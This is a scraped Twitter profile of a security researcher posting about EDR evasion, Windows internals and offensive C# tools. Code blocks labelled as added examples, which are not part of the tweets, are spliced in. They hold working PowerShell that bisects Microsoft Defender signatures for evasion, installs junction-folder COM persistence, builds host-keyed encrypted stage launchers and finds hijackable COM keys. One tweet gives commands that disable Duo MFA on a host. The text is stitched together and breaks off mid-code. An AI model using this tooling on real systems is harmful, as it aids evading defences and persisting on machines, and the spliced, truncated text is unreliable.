Matt Hand

@matterpreter

9,109
Followers
296
Following
36
Media
851
Statuses

Director, Security Research @preludeorg 💜 | Author of Evading EDR 📖 | Adversary tradecraft & windows internals 🦠

USA
Joined June 2010
Pinned Tweet
@matterpreter
Matt Hand
1 year
I've long been interested in how EDRs work under the hood and how we can apply a more evidence-based approach to evasion. I'm happy to announce that I've written a book covering these topics with @nostarch which is now available for preorder 🎉
@matterpreter
Matt Hand
5 years
Want to make service removal really fun? Create a service with a unicode name. The service will run but won't show in sc.exe, services.msc, or taskmgr.exe and will sometimes cause a critical error while trying to find it with PowerShell/WMI. Unicode wins again.🤦‍♂️
@matterpreter
Matt Hand
4 years
Just released a post detailing a methodology for analyzing Windows drivers. My goal is to lower the barrier to entry for finding exploitable driver vulnerabilities through static reversing.
@matterpreter
Matt Hand
5 years
Releasing a new tool to aid in Sysmon evasion, Shhmon () with an associated blog post including defensive recommendations
@matterpreter
Matt Hand
11 months
So surreal to finally have a copy in my hands. What a journey this has been. Thank you to everyone at @nostarch who made this a reality.
@matterpreter
Matt Hand
5 years
I've been poking around the Windows kernel a lot lately and one of my favorite samples I've referenced is Mimikatz's driver, Mimidrv. I took some time and documented all of its functions and included some write-ups on important kernel structures. Post: 1/3
@matterpreter
Matt Hand
4 years
New blog post discussing approaches to evasion that use less anecdotal evidence (technique X worked against Y) to one which uses observed agent capabilities to determine OPSEC-safe techniques. 1/5
@matterpreter
Matt Hand
4 years
Pushed a new tool, InspectAssembly, to OffensiveC#. This project inspects a target .NET assembly's CIL for calls to deserializers and checks if .NET remoting is being used to aid in finding potential privilege escalations on the host.
@matterpreter
Matt Hand
6 years
Dropping 8 new C# tools I’ve been working on for a little while. Really enjoyed writing these and I plan to continue adding to the repo.
@matterpreter
Matt Hand
5 years
Wrote a quick little tool to help make evasion work a little easier. This project finds the exact byte that Defender will flag on and then dumps the offending bytes, signature name, and offset. Could be helpful for testing/modifying tools and payloads.
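The prefix bisection that such a tool performs, as an added example (not DefenderCheck's own code): it asks Defender to scan progressively shorter prefixes of the file until it finds the smallest prefix that still fires, then dumps the bytes at that boundary. The MpCmdRun.exe location, its `-Scan -ScanType 3 -File ... -DisableRemediation` switches, the "Threat :" output line and exit code 2 on detection are assumptions about the current Defender build; the payload path is a placeholder.

```powershell
# Added example: locate the byte offset at which Microsoft Defender starts flagging a file.
function Invoke-DefenderScan {
    param([byte[]]$Bytes, [string]$ScratchFile)
    # -DisableRemediation keeps Defender from quarantining the scratch file between probes (assumed switch).
    [IO.File]::WriteAllBytes($ScratchFile, $Bytes)
    $mpcmd = Join-Path $env:ProgramFiles 'Windows Defender\MpCmdRun.exe'
    $out = & $mpcmd -Scan -ScanType 3 -File $ScratchFile -DisableRemediation 2>&1 | Out-String
    # A hit prints a "Threat : <signature>" line; exit code 2 also signals a detection (both assumed).
    $sig = if ($out -match 'Threat\s*:\s*(\S+)') { $Matches[1] } else { $null }
    [pscustomobject]@{ Flagged = ($LASTEXITCODE -eq 2 -or $null -ne $sig); Signature = $sig }
}

function Find-DefenderFlagOffset {
    param(
        [Parameter(Mandatory)][string]$Path,
        [string]$ScratchFile = (Join-Path $env:TEMP 'defcheck.bin'),
        [int]$Context = 32
    )
    $data = [IO.File]::ReadAllBytes($Path)
    $full = Invoke-DefenderScan -Bytes $data -ScratchFile $ScratchFile
    if (-not $full.Flagged) { Write-Host 'File is not flagged; nothing to bisect.'; return }

    # Invariant: prefix[0..$lo) is clean, prefix[0..$hi) is flagged. Halve the gap until adjacent,
    # which costs log2(size) scans instead of one per byte.
    $lo = 0; $hi = $data.Length; $lastSig = $full.Signature
    while ($hi - $lo -gt 1) {
        $mid = [int][Math]::Floor(($lo + $hi) / 2)
        $prefix = New-Object byte[] $mid
        [Array]::Copy($data, $prefix, $mid)
        $r = Invoke-DefenderScan -Bytes $prefix -ScratchFile $ScratchFile
        if ($r.Flagged) { $hi = $mid; if ($r.Signature) { $lastSig = $r.Signature } } else { $lo = $mid }
    }
    Remove-Item -LiteralPath $ScratchFile -ErrorAction SilentlyContinue

    $offset = $hi - 1                       # last byte Defender needs to see before it fires
    $start  = [Math]::Max(0, $offset - $Context)
    [pscustomobject]@{
        Signature = $lastSig
        Offset    = ('0x{0:X}' -f $offset)
        Bytes     = (($data[$start..$offset] | ForEach-Object { '{0:X2}' -f $_ }) -join ' ')
        Ascii     = -join ($data[$start..$offset] | ForEach-Object { if ($_ -ge 0x20 -and $_ -le 0x7E) { [char]$_ } else { '.' } })
    }
}

Find-DefenderFlagOffset -Path 'C:\Tools\payload.exe'   # placeholder path
```

Two caveats a practitioner will hit: the scratch directory must not be excluded from scanning, and a prefix search only finds the first signature; once that region is modified, rerun to see whether a second signature sits further into the file.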
@matterpreter
Matt Hand
5 years
Want to use Win32 API calls to get around some pesky command line logging? Not sure how to start or how this fits into some C# tooling? I've released a blog post today on interoperability and marshaling as an introduction
@matterpreter
Matt Hand
5 years
Just pushed a new POC, DriverQuery, up to the OffensiveC# repo. This allows operators to get details about kernel drivers registered on the system (and optionally only return ones not signed by Microsoft) for targeting or exfil/analysis.
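An added example of the same enumeration in PowerShell (not DriverQuery's code): it lists running kernel drivers from WMI, normalizes the NT-style image paths WMI returns, and keeps only those whose Authenticode or catalog signer is not Microsoft, which is the short list worth pulling back for the kind of static analysis described in the driver-methodology post above. The `O=Microsoft Corporation` subject match is my heuristic.

```powershell
# Added example: enumerate running drivers and report their signers.
function Convert-DriverPath {
    param([string]$PathName)
    if ([string]::IsNullOrWhiteSpace($PathName)) { return $null }
    $p = $PathName -replace '^\\\?\?\\', ''                         # \??\C:\...  -> C:\...
    $p = $p -replace '^\\SystemRoot', $env:SystemRoot               # \SystemRoot\... -> C:\Windows\...
    $p = $p -replace '^system32\\', "$env:SystemRoot\System32\"     # bare system32\drivers\x.sys
    if (-not [IO.Path]::IsPathRooted($p)) { $p = Join-Path $env:SystemRoot $p }
    return $p
}

function Get-DriverSigner {
    Get-CimInstance -ClassName Win32_SystemDriver |
        Where-Object { $_.State -eq 'Running' } |
        ForEach-Object {
            $path = Convert-DriverPath $_.PathName
            $sig = if ($path -and (Test-Path -LiteralPath $path)) {
                # Get-AuthenticodeSignature also validates catalog-signed images, which most inbox drivers are.
                Get-AuthenticodeSignature -FilePath $path
            } else { $null }
            $subject = if ($sig -and $sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { '' }
            [pscustomobject]@{
                Name        = $_.Name
                ImagePath   = $path
                Status      = if ($sig) { $sig.Status } else { 'FileNotFound' }
                Signer      = $subject
                IsMicrosoft = ($subject -match 'O=Microsoft Corporation')   # heuristic
            }
        }
}

# Third-party (or unsigned) drivers are the targeting / exfil candidates.
Get-DriverSigner | Where-Object { -not $_.IsMicrosoft } |
    Sort-Object Status | Format-Table Name, Status, Signer, ImagePath -AutoSize
```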
@matterpreter
Matt Hand
4 years
Today I'm pushing up HijackHunter to the OffensiveC# repo. This tool works by parsing the IAT and delay load table of a PE and testing each import for potential hijacks. If a hijack is detected, it will tell you why it determined it and how to abuse it.
@matterpreter
Matt Hand
3 years
In our never-ending hunt for new persistence techniques, @mutantvillian and I spent some time digging into using preview handlers over the past few weeks. Today we're publishing our research along with detection guidance.
@matterpreter
Matt Hand
1 year
Preorders are live!
@nostarch
No Starch Press
1 year
Evading EDR, by Matt Hand, gives an inside look at how Endpoint Detection & Response agents pinpoint adversary activity. Learn the ways each sensor component collects data, how to design an EDR, & how to evade one. Pre-order at 30% off w/ code GOTCHA:
@matterpreter
Matt Hand
1 year
Dell finally released the advisory and patch so I'm finally able to drop the blog on CVE-2023-28072, an LPE in Alienware Command Center. Yes, we're still finding and exploiting .NET Remoting in 2023🙃
@matterpreter
Matt Hand
1 year
Over the past few days, I've been documenting how Windows identifies hypervisors using NtQuerySystemInformation and creating a C++ alternative with quality-of-life improvements. Here's a new blog with the details:
@matterpreter
Matt Hand
3 years
Been spending a lot of time hunting down event sources lately to make better sense of some detections we've run into on operations. I wrote a little tool to help find event providers by recursively parsing directories/files for the specified GUID.
@matterpreter
Matt Hand
6 years
Wrote a quick C# program to enumerate abandoned COM keys. Useful for persistence as you can, in some cases, write to the missing location and call with `rundll32.exe -sta {CLSID}`. Thanks to @bohops for the solid post outlining this technique.
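An added PowerShell equivalent of that enumeration (not Matt Hand's program): it walks HKCR\CLSID, normalizes each InProcServer32/LocalServer32 default value, and reports entries whose server no longer exists on disk, together with the `rundll32.exe -sta {CLSID}` trigger from the tweet. Whether the missing location is actually writable still has to be checked by hand; the `ParentExists` column only tells you how much of the path you would need to create.

```powershell
# Added example: find COM servers registered to files that are gone ("abandoned" keys).
function Get-AbandonedComServer {
    $root = 'Registry::HKEY_CLASSES_ROOT\CLSID'   # merged view of HKLM and HKCU\Software\Classes
    foreach ($clsid in Get-ChildItem -Path $root -ErrorAction SilentlyContinue) {
        foreach ($serverKey in 'InProcServer32', 'LocalServer32') {
            $keyPath = "$($clsid.PSPath)\$serverKey"
            if (-not (Test-Path -LiteralPath $keyPath)) { continue }
            $raw = (Get-ItemProperty -LiteralPath $keyPath -ErrorAction SilentlyContinue).'(default)'
            if ([string]::IsNullOrWhiteSpace($raw)) { continue }

            # Normalize: strip surrounding quotes or trailing switches, expand %SystemRoot% and friends.
            $path = $raw.Trim()
            $path = if ($path -match '^"([^"]+)"') { $Matches[1] } else { ($path -split '\s+(?=[/-])')[0] }
            $path = [Environment]::ExpandEnvironmentVariables($path)

            # Bare names such as "shell32.dll" resolve through the loader search order; that is a
            # different (DLL hijack) problem, so they are skipped here.
            if (-not [IO.Path]::IsPathRooted($path)) { continue }
            if (Test-Path -LiteralPath $path) { continue }

            [pscustomobject]@{
                CLSID        = $clsid.PSChildName
                ServerType   = $serverKey
                MissingPath  = $path
                ParentExists = Test-Path -LiteralPath (Split-Path -Path $path -Parent)
                Trigger      = "rundll32.exe -sta $($clsid.PSChildName)"
            }
        }
    }
}

Get-AbandonedComServer | Format-Table -AutoSize
```

This takes a minute on a typical host (a few thousand CLSIDs). Because HKCU\Software\Classes is consulted before HKLM for a non-elevated process, the same walk over `HKCU:\Software\Classes\CLSID` is where a defender should look for entries that were added rather than abandoned.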
@matterpreter
Matt Hand
4 years
DLL hijacks still have value today but our approach to finding them may not always be the best. PATH hijacks are easy to find but miss things earlier in the search order. Loading Procmon on target isn't always safe. You may not be able to exfil on the target app to test in a lab.
@matterpreter
Matt Hand
5 years
Hey Defender friends. Turns out that removing those services with Unicode/non-printable characters is pretty hard, so I wrote you a tool to help with that. I'll be releasing the offensive PoC later this week or early next week.
@matterpreter
Matt Hand
3 years
Finding ways to stay busy and decided to run a super unscientific survey of open source offensive C# tools. I wanted to see what functions were most commonly P/Invoke'd across the tools (n=100). The results weren't quite what I expected but still a really interesting experiment.
@matterpreter
Matt Hand
2 years
Microsoft: Also Microsoft:
@markrussinovich
Mark Russinovich
2 years
Speaking of languages, it's time to halt starting any new projects in C/C++ and use Rust for those scenarios where a non-GC language is required. For the sake of security and reliability, the industry should declare those languages as deprecated.
@matterpreter
Matt Hand
4 years
I wrote a little Ghidra script to allow us to ingest function call trees with Neo4j. It was specifically built to help map Native APIs->EtwTi* sensors in the kernel, so here's a sample of the data we're able to get.
@matterpreter
Matt Hand
3 years
This one is a little different for me, but I wanted to document how I approach research projects at a high level, share some stories, and address some common issues I've seen while advising others. Hope you enjoy!
@matterpreter
Matt Hand
1 year
After spending nearly my entire career as a red team operator, I'm happy to share that I've joined @preludeorg to help build our prod-scale continuous security testing platform, Detect. Excited to make adversaries' lives *much* more difficult 😈 #infosec
@matterpreter
Matt Hand
2 years
See you tomorrow 😈
@matterpreter
Matt Hand
9 months
Windows is a meme. I've spent the better part of the afternoon wondering why my code isn't working. Turns out this has been known since at least 2021... @dennisbabkin
@matterpreter
Matt Hand
4 years
Pushed some quality of life improvements to OffensiveC# to make it a little easier to use, integrate into existing workflows better, be more C2-friendly, and squashed some bugs along the way.
@matterpreter
Matt Hand
5 years
Temporarily disable Duo authentication on a Windows host. Nice for when you need a temporary RDP session:
regsvr32 /s /u "C:\Program Files\Duo Security\WindowsLogon\DuoCredProv.dll"
regsvr32 /s /u "C:\Program Files\Duo Security\WindowsLogon\DuoCredFilter.dll"
cc: TwitterlessNick
@matterpreter
Matt Hand
3 years
I'm proud to announce that the @SpecterOps Vulnerability Research for Operators course was selected for 2 runs at Black Hat USA this year. I'm really excited to teach the course with @enigma0x3 and we hope you join us JUL31-AUG1 or AUG2-3.
@matterpreter
Matt Hand
4 years
Also, huge shout out to @monoxgas for writing my favorite post on DLL hijack tradecraft ever, which reignited my interest in this technique
@matterpreter
Matt Hand
3 years
Did a little digging into this one and it appears this stems from a call to ShellExecuteW inside of WorkFolders.exe /1
@ElliotKillick
Elliot
3 years
I found out "C:\Windows\System32\WorkFolders.exe" (signed by MS) can be used to run arbitrary executables in the current working directory with the name control.exe. It's like a new rundll32.exe #lolbin but for EXEs!
@matterpreter
Matt Hand
6 years
Biggest takeaway from #infiltratecon - Tons of research time and money going towards mobile exploits. More advanced threat groups don't care about your XSS and are operating at a scale unimaginable by private firms. Groups are paying $$$$ for bugs - sign of how critical these are.
@matterpreter
Matt Hand
9 months
When do you consider an EDR evasion to be successful? If it's something else, please let me know in the comments.
Not blocked automatically
112
Not responded to
86
No alert generated
406
Telemetry doesn't exist
194
@matterpreter
Matt Hand
5 years
Added C:\ physical drive serial keying and volume serial keying via WMI to Spotter as briefly described in the #APT41 report (Pages 21, 25). Physical serial keying appears to be fairly robust as I am not aware of any way to modify/spoof that attribute.
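Environmental keying of the kind described above, as an added example (not Spotter's code): the physical serial of the disk behind C: and the C: volume serial are read through CIM/WMI, hashed into an AES-256 key, and the key is used to wrap and unwrap a stage. The salt string and the stage text are placeholders; everything else is standard .NET and CIM. Physical serials come from Win32_DiskDrive here, which on current Windows carries the same value as Win32_PhysicalMedia.

```powershell
# Added example: derive a host-bound AES-256 key and use it to protect a stage.
function Get-HostKeyMaterial {
    $logical   = Get-CimInstance -ClassName Win32_LogicalDisk -Filter "DeviceID='C:'"
    $partition = Get-CimAssociatedInstance -InputObject $logical -ResultClassName Win32_DiskPartition
    $drive     = Get-CimAssociatedInstance -InputObject $partition -ResultClassName Win32_DiskDrive
    [pscustomobject]@{
        PhysicalSerial = ([string]($drive.SerialNumber | Select-Object -First 1)).Trim()
        VolumeSerial   = $logical.VolumeSerialNumber
    }
}

function New-KeyedAesKey {
    param([string]$PhysicalSerial, [string]$VolumeSerial, [string]$Salt = 'example-salt')   # salt is a placeholder
    # SHA-256 over the keying material yields the 32-byte AES-256 key. The "secret" is the host
    # itself, so this is about keying, not about resisting offline brute force.
    $material = [Text.Encoding]::UTF8.GetBytes("$Salt|$PhysicalSerial|$VolumeSerial")
    [Security.Cryptography.SHA256]::Create().ComputeHash($material)
}

function Protect-Stage {
    param([byte[]]$Key, [byte[]]$Plaintext)
    $aes = [Security.Cryptography.Aes]::Create()       # AES-CBC, PKCS7 by default
    $aes.Key = $Key
    $aes.GenerateIV()
    $ct = $aes.CreateEncryptor().TransformFinalBlock($Plaintext, 0, $Plaintext.Length)
    [byte[]]($aes.IV + $ct)                            # IV prefixed so the launcher can recover it
}

function Unprotect-Stage {
    param([byte[]]$Key, [byte[]]$Blob)
    $aes = [Security.Cryptography.Aes]::Create()
    $aes.Key = $Key
    $aes.IV  = [byte[]]$Blob[0..15]
    try {
        $aes.CreateDecryptor().TransformFinalBlock($Blob, 16, $Blob.Length - 16)
    } catch [Security.Cryptography.CryptographicException] {
        # Wrong host: the PKCS7 padding check almost always fails. Return nothing rather than run garbage.
        # (Padding is not an integrity check; add an HMAC if a silent false positive matters.)
        $null
    }
}

$km    = Get-HostKeyMaterial
$key   = New-KeyedAesKey -PhysicalSerial $km.PhysicalSerial -VolumeSerial $km.VolumeSerial
$blob  = Protect-Stage -Key $key -Plaintext ([Text.Encoding]::UTF8.GetBytes('Write-Host "stage ran on the keyed host"'))   # placeholder stage
$stage = Unprotect-Stage -Key $key -Blob $blob
if ($stage) { [Text.Encoding]::UTF8.GetString($stage) } else { 'Key material mismatch' }
```

On a VM the physical serial can be empty or a vendor constant, which is exactly why the volume serial is mixed in as a second component.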
@matterpreter
Matt Hand
3 years
The past few years have been incredibly hard on our family, but tonight we will be giving her the last dose of chemo, marking the end of treatment. She beat leukemia🧡
@matterpreter
Matt Hand
4 years
I drew a great deal of inspiration from @_ForrestOrr 's Siofra () and heavily referenced @spottheplanet 's post on manually parsing PE headers ().
@matterpreter
Matt Hand
3 years
We have to challenge the status quo of phishing. Phishing was still the initial access vector for 23% of breaches (M-Trends, 2021) and what we've always done might not be what we need today. 1/2
@SpecterOps
SpecterOps
3 years
As the state of security continues to evolve, we decided it was time to renew our approach to phishing during red team operations. Today, we're outlining our plans to make initial access ops more valuable to our customers. Read more here:
@matterpreter
Matt Hand
3 years
Just under 2 hours out from the first run of our Adversary Tactics: Vulnerability Research for Operators course at #BHUSA 🎉
@matterpreter
Matt Hand
9 months
The results are in, and a majority of folks chose either no alert or no telemetry. This is pretty interesting to me as both of these aren't really measurable unless you have access to the EDR - something that I very rarely had as a red teamer.
@matterpreter
Matt Hand
9 months
When do you consider an EDR evasion to be successful? If it's something else, please let me know in the comments.
@matterpreter
Matt Hand
9 months
Super excited to have @jsecurity101 on the team. We're going to be working on some really cool research that we believe will have asymmetric effects on the threat landscape. I look forward to seeing all the cool stuff Jonny cooks up 🙌
@jsecurity101
Jonny Johnson
9 months
Excited to announce that I have officially started at @preludeorg as a Principal Security Engineer. Let the fun begin😎
@matterpreter
Matt Hand
3 years
Expanded on the great work done by @reenz0h to add procedure identification for x86 RPC servers to #Ghidra
@matterpreter
Matt Hand
6 years
User persistence through junction folders as described in the Vault 7 leaks now in the OffensiveC# repo. TLDR; Add a CLSID to the end of a file and add a key in HKCU mapping it to a DLL. Verclsid.exe will execute the DLL when the file is browsed/on boot.
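An added PowerShell rendering of the technique and its audit (not the OffensiveC# implementation): the first function registers a fresh CLSID under HKCU with an InProcServer32 pointing at a DLL and creates a folder named `<name>.{CLSID}` where Explorer will render it; the second walks directories for that naming pattern and resolves each CLSID back to its server so a defender can see which entries are per-user or point outside the Windows directory. The DLL path, folder name and the Startup folder default are placeholders.

```powershell
# Added example: junction-folder persistence (install) and a matching audit.
function Install-JunctionFolder {
    param(
        [Parameter(Mandatory)][string]$DllPath,                                # placeholder: your DLL
        [string]$Directory = [Environment]::GetFolderPath('Startup'),          # rendered by Explorer at logon
        [string]$FolderName = 'Updates'                                        # placeholder name
    )
    $clsid = '{' + [guid]::NewGuid().ToString().ToUpper() + '}'
    # HKCU\Software\Classes is consulted before HKLM for a non-elevated process, so no admin rights needed.
    $clsidKey = "HKCU:\Software\Classes\CLSID\$clsid"
    New-Item -Path $clsidKey -Force | Out-Null
    $server = New-Item -Path "$clsidKey\InProcServer32" -Force
    Set-ItemProperty -Path $server.PSPath -Name '(default)'      -Value $DllPath
    Set-ItemProperty -Path $server.PSPath -Name 'ThreadingModel' -Value 'Apartment'
    $folder = Join-Path $Directory "$FolderName.$clsid"
    New-Item -Path $folder -ItemType Directory -Force | Out-Null
    [pscustomobject]@{ CLSID = $clsid; Folder = $folder; Dll = $DllPath }
}

function Find-JunctionFolder {
    param([string[]]$Roots = @($env:USERPROFILE, $env:ProgramData))
    $re = '\.(\{[0-9A-Fa-f]{8}-(?:[0-9A-Fa-f]{4}-){3}[0-9A-Fa-f]{12}\})$'
    foreach ($root in $Roots) {
        Get-ChildItem -Path $root -Directory -Recurse -Force -ErrorAction SilentlyContinue |
            ForEach-Object {
                if ($_.Name -match $re) {
                    $clsid = $Matches[1]
                    $server = $null; $source = 'none'
                    # Check the per-user hive first (it wins), then the merged HKCR view.
                    foreach ($cand in @(
                        @{ Path = "HKCU:\Software\Classes\CLSID\$clsid\InProcServer32";             Tag = 'HKCU' },
                        @{ Path = "Registry::HKEY_CLASSES_ROOT\CLSID\$clsid\InProcServer32";        Tag = 'HKCR' })) {
                        if (Test-Path -LiteralPath $cand.Path) {
                            $server = (Get-ItemProperty -LiteralPath $cand.Path).'(default)'
                            $source = $cand.Tag
                            break
                        }
                    }
                    [pscustomobject]@{
                        Folder       = $_.FullName
                        CLSID        = $clsid
                        ServerDll    = $server
                        RegisteredIn = $source
                        # Legitimate junction folders (e.g. Control Panel) live in HKLM and point into %SystemRoot%.
                        Suspicious   = ($source -eq 'HKCU') -or ($server -and $server -notmatch '^(%SystemRoot%|[A-Za-z]:\\Windows)\\')
                    }
                }
            }
    }
}

# Install-JunctionFolder -DllPath 'C:\Users\Public\payload.dll'   # placeholder
Find-JunctionFolder | Where-Object Suspicious | Format-Table -AutoSize
```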
@matterpreter
Matt Hand
3 years
I don't really talk about my personal life on here, but here goes nothing. [CW: Childhood illness]
@matterpreter
Matt Hand
3 years
A little late but I wrapped up @standa_t 's hypervisor development course last week and had a blast. Satoshi is a great instructor and I'd highly recommend it for anyone interested in hypervisor internals.
@matterpreter
Matt Hand
3 years
Heads up that if you received Defender update 1.337.157.0 (4/29/2021 1:49:46 AM), DefenderCheck is now classified as VirTool:MSIL/BytzChk.C!MTB 🙄
@matterpreter
Matt Hand
6 years
Released Spotter, a tool for generating environmentally keyed, AES256 encrypted stage0 PS/.NET launchers, today at #ArcticCon with @l0gan54k
@matterpreter
Matt Hand
5 years
Thankfully, you can remove them by deleting the keys with regedit, which is able to render Unicode characters.
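Tying together the Unicode-service tweet, the removal tool for defenders and this regedit note, here is an added PowerShell example (not Matt Hand's tool): it reads service names from the registry, where every key is visible whatever sc.exe or services.msc manage to display, flags names containing characters outside printable ASCII, shows them as escaped code points so they can be pasted into a report, and records whether the SCM enumeration that PowerShell uses even returns them. Removal is the registry-key deletion the note describes, left commented out.

```powershell
# Added example: find services whose names hide from the usual tooling.
function Get-OddServiceName {
    $servicesKey = 'HKLM:\SYSTEM\CurrentControlSet\Services'
    # Get-Service goes through the SCM, the same path sc.exe uses; it can throw on such names, so tolerate it.
    $scmNames = @{}
    Get-Service -ErrorAction SilentlyContinue | ForEach-Object { $scmNames[$_.Name] = $true }

    foreach ($key in Get-ChildItem -Path $servicesKey -ErrorAction SilentlyContinue) {
        $name = $key.PSChildName
        if ($name -notmatch '[^\x20-\x7E]') { continue }          # printable ASCII only: not interesting
        $props = Get-ItemProperty -LiteralPath $key.PSPath -ErrorAction SilentlyContinue
        $escaped = -join ($name.ToCharArray() | ForEach-Object {
            $c = [int]$_
            if ($c -ge 0x20 -and $c -le 0x7E) { [string]$_ } else { '\u{0:X4}' -f $c }
        })
        [pscustomobject]@{
            Name         = $name
            Escaped      = $escaped           # e.g. "Upd\u200Bater" for a zero-width space
            ImagePath    = $props.ImagePath
            StartType    = $props.Start
            VisibleToSCM = $scmNames.ContainsKey($name)
            RegistryPath = $key.PSPath
        }
    }
}

$odd = Get-OddServiceName
$odd | Format-List

# Removal (run elevated, after confirming the entry is hostile). sc.exe cannot address the name,
# so delete the key directly, as regedit would; the SCM drops its cached entry at the next boot.
# $odd | ForEach-Object { Remove-Item -LiteralPath $_.RegistryPath -Recurse -Force }
```

Note that zero-width and combining characters render as nothing in most consoles, which is why the `Escaped` column matters more than `Name` when two services appear to share a name.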
@matterpreter
Matt Hand
4 years
I've also created a Frida script to hook native APIs to facilitate testing against a simulated EDR agent. While this script is meant to accompany SHAPESHIFTER's agent, it can easily be used to test other tools and expanded to cover more native APIs 5/5
@matterpreter
Matt Hand
5 years
I want to sincerely thank @gentilkiwi for releasing Mimidrv. It is an invaluable resource for understanding how we can leverage kernel functions for offense 🥝❤️ 3/3
@matterpreter
Matt Hand
5 years
💜
@SpecterOps
SpecterOps
5 years
We are pleased to announce the addition of two new team members today: @s0lst1c3 and @matterpreter Welcome aboard!
@matterpreter
Matt Hand
11 months
I had a great time presenting at @BlackAlpsConf with @winternl_t last week. The con was very well run and had some great talks, plus you can’t really beat the location 🏔️See you all next year!
@matterpreter
Matt Hand
6 years
Link to the post:
@matterpreter
Matt Hand
2 years
If you're going to read one post this month, it should be this one. Optimizing decision making on operations is going to be a *huge* leap forward.
@Jackson_T
Jackson T.
2 years
In this post, I discuss one key difference in the thinking between sophisticated adversaries and many of the red teams that try to simulate them, as well as what that means for tradecraft and tooling.
@matterpreter
Matt Hand
4 years
Had fun reversing some legacy Windows code with @jsecurity101 for this one. Just a reminder that capability abstraction has a huge benefit for offensive practitioners as well 😈
@jsecurity101
Jonny Johnson
4 years
Happy Monday everyone! Today @matterpreter and I are releasing a joint blog where we dive deep into the methodology we used to uncover the technology that atsvc utilizes within scheduled tasks. Hope you enjoy!
@matterpreter
Matt Hand
4 years
This PoC uses a reconnaissance agent to detect usermode function hooks and ships results back to a server which parses them, creates a template payload using "safe" techniques, compiles it, and then ships it back to the original agent to run it inline. 3/5
@matterpreter
Matt Hand
5 years
@YouDownWithTTPs @Oddvarmoe As promised, here are the events in both Event Viewer and PowerShell.
@matterpreter
Matt Hand
5 years
I will be supporting Spotter, going forward on my personal GitHub as both @l0gan54k and I have moved onto greener pastures. The new location is
@matterpreter
Matt Hand
4 years
AT:VRO has been my passion project for the past few months and I'm incredibly excited to teach it along with an amazing cadre of instructors. If you're interested in finding and exploiting vulnerabilities in 3rd party software on Windows, we still have seats open 😈
@SpecterOps
SpecterOps
4 years
At SO-CON 2020, we are launching two new training courses in the Adversary Tactics series. Mac Tradecraft and Vulnerability Research for Operators. All students receive coins. Here is a quick preview thanks to @BlakeMoorhouse Sign up here:
@matterpreter
Matt Hand
13 years
Just started watching the @owasp appsec series and I am VERY impressed. Good job, guys. http://t.co/CA9GR2Ab
@matterpreter
Matt Hand
4 years
Additionally, I've pushed just the reconnaissance tool from SHAPESHIFTER up to OffensiveC# as HookDetector 4/5
@matterpreter
Matt Hand
3 years
Just merged in the ability to search based on a provider name as well as by its GUID. The tool will also report if EtwRegister() or EventRegister() is imported, which should help hone in on which image is the true event source.
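For the event-source hunt described in the earlier tweet and refined here, an added PowerShell example (not Matt Hand's tool): it searches every DLL/EXE/SYS under a directory for a provider GUID in the three forms it can take inside an image (the 16-byte GUID structure, the braced ASCII string, and the braced UTF-16 string) and notes whether the file also contains the `EtwRegister` (kernel) or `EventRegister` (user-mode) import name. The byte search maps the file through Latin-1 so that `String.IndexOf` does the work; the import check is a plain string search rather than a real import-table parse, which is good enough to rank candidates. The Threat-Intelligence provider GUID in the usage line is the only value assumed.

```powershell
# Added example: which images under a directory reference a given ETW provider GUID?
function Find-EtwProviderImage {
    param(
        [Parameter(Mandatory)][guid]$ProviderGuid,
        [string]$Root = "$env:SystemRoot\System32",
        [string[]]$Extensions = @('.dll', '.exe', '.sys')
    )
    $latin1 = [Text.Encoding]::GetEncoding(28591)        # ISO-8859-1: byte N <-> char N, so IndexOf is a byte search
    $braced = '{' + $ProviderGuid.ToString().ToUpper() + '}'
    $needles = @{
        Binary = @{ Text = $latin1.GetString($ProviderGuid.ToByteArray());                       Cmp = [StringComparison]::Ordinal }
        Ascii  = @{ Text = $braced;                                                               Cmp = [StringComparison]::OrdinalIgnoreCase }
        Utf16  = @{ Text = $latin1.GetString([Text.Encoding]::Unicode.GetBytes($braced));         Cmp = [StringComparison]::OrdinalIgnoreCase }
    }

    Get-ChildItem -Path $Root -File -Recurse -ErrorAction SilentlyContinue |
        Where-Object { $Extensions -contains $_.Extension.ToLower() } |
        ForEach-Object {
            try { $hay = $latin1.GetString([IO.File]::ReadAllBytes($_.FullName)) } catch { return }
            $hits = foreach ($k in $needles.Keys) {
                $i = $hay.IndexOf($needles[$k].Text, $needles[$k].Cmp)
                if ($i -ge 0) { '{0}@0x{1:X}' -f $k, $i }
            }
            if ($hits) {
                [pscustomobject]@{
                    File          = $_.FullName
                    Matches       = ($hits -join ', ')
                    # The true event source registers the provider; a consumer or manifest merely names it.
                    EtwRegister   = $hay.IndexOf('EtwRegister',   [StringComparison]::Ordinal) -ge 0
                    EventRegister = $hay.IndexOf('EventRegister', [StringComparison]::Ordinal) -ge 0
                }
            }
        }
}

# Microsoft-Windows-Threat-Intelligence (assumed GUID); expect ntoskrnl.exe with EtwRegister = True.
Find-EtwProviderImage -ProviderGuid 'F4E1897C-BB5D-5668-F1D8-040F4D8DD344' | Format-Table -AutoSize
```

Reading every file through `ReadAllBytes` is far slower than the seven seconds quoted above for the compiled tool, so narrow `-Root` when iterating.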
@matterpreter
Matt Hand
9 years
On exploiting: "Don't use a Ferrari when a cheap car will do." #infiltrate2015
@matterpreter
Matt Hand
4 years
@byt3bl33d3r Yep! For example, Sysmon is registered at 385201, which is one of the ways that Shhmon locates it in case the default name has changed. While these altitudes are registered with MSFT, they aren't enforced. The mini filter can be moved to a different altitude that isn't taken.
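Altitude-based identification, as an added example (not Shhmon's code): minifilter instances are enumerated from each driver's `Instances` subkey in the registry and cross-checked against what `fltmc` reports as loaded, keyed on altitude rather than driver name so a renamed Sysmon driver still stands out at 385201. This only covers minifilters; an EDR's primary callback driver is a separate object and will not appear here. `fltmc` needs an elevated prompt.

```powershell
# Added example: list minifilter altitudes from the registry and from fltmc, and flag 385201.
function Get-MinifilterAltitude {
    $servicesRoot = 'HKLM:\SYSTEM\CurrentControlSet\Services'
    foreach ($svc in Get-ChildItem -Path $servicesRoot -ErrorAction SilentlyContinue) {
        $instRoot = "$($svc.PSPath)\Instances"
        if (-not (Test-Path -LiteralPath $instRoot)) { continue }
        $svcProps = Get-ItemProperty -LiteralPath $svc.PSPath -ErrorAction SilentlyContinue
        foreach ($inst in Get-ChildItem -LiteralPath $instRoot -ErrorAction SilentlyContinue) {
            $p = Get-ItemProperty -LiteralPath $inst.PSPath -ErrorAction SilentlyContinue
            if (-not $p.Altitude) { continue }
            [pscustomobject]@{
                Driver    = $svc.PSChildName
                Instance  = $inst.PSChildName
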